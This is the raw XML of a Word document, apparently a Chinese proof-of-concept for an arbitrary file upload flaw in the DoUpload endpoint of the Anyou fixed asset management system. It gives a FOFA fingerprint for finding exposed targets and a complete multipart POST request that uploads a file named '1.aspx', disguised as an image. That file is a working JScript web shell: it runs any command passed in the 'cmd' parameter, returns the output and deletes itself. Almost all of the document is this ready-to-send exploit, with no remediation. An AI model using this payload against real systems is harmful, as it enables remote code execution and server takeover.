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38012">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安友固定资产管理系统 DoUpload 任意文件上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540C4F6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E05E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FOFA：body="style/v2/layuiadmin/lib/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DEA3D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="654110B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58091299">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3471A0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26C576C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6220BE8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POST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/manage/Attachment/DoUpload?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bocode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71AFC9D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280C5E7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(ZZ;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Linux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x86_64)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Chrome/141.0.0.0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28E92BF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Cookie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AnnYouDevBaseAdfv3adfUserCode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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8DA08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814662"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA4A9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</w:p>
    <w:p w14:paraId="5E33612F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------WebKitFormBoundaryx8jO2oVc6SWP3Sad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B18CE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Content-Disposition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form-data;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name="file"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filename="1.aspx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0E48B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image/png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA03F69">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B829B5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&lt;%@ Page Language="Jscript" validateRequest="false" %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E9F74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&lt;%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD58C8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var c=new System.Diagnostics.ProcessStartInfo("cmd");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF3F5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var e=new System.Diagnostics.Process();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D648F3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var out:System.IO.StreamReader,EI:System.IO.StreamReader;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA66F4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c.UseShellExecute=false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0862D2B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c.RedirectStandardOutput=true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039291A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c.RedirectStandardError=true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A01B0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e.StartInfo=c;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD74CD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c.Arguments="/c " + Request.Item["cmd"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DEBC5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e.Start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313947C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out=e.StandardOutput;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699832F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EI=e.StandardError;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7408AEF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e.Close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737AB01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Response.Write(out.ReadToEnd() + EI.ReadToEnd());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA28ED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System.IO.File.Delete(Request.PhysicalPath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E94E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Response.End();%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A4FA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------WebKitFormBoundaryx8jO2oVc6SWP3Sad--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7A120B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34AFAA0C"/>
    <w:p w14:paraId="61509DA8"/>
    <w:p w14:paraId="2B93288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E31600"/>
    <w:rsid w:val="5A76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1018</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1054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2025-12-12T04:02:00Z</dcterms:created>
  <dc:creator>m1813</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:10:46Z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98511D2198C8408781E9AC1EBA2618E7_12</vt:lpwstr>
  </property>
</Properties>
</file>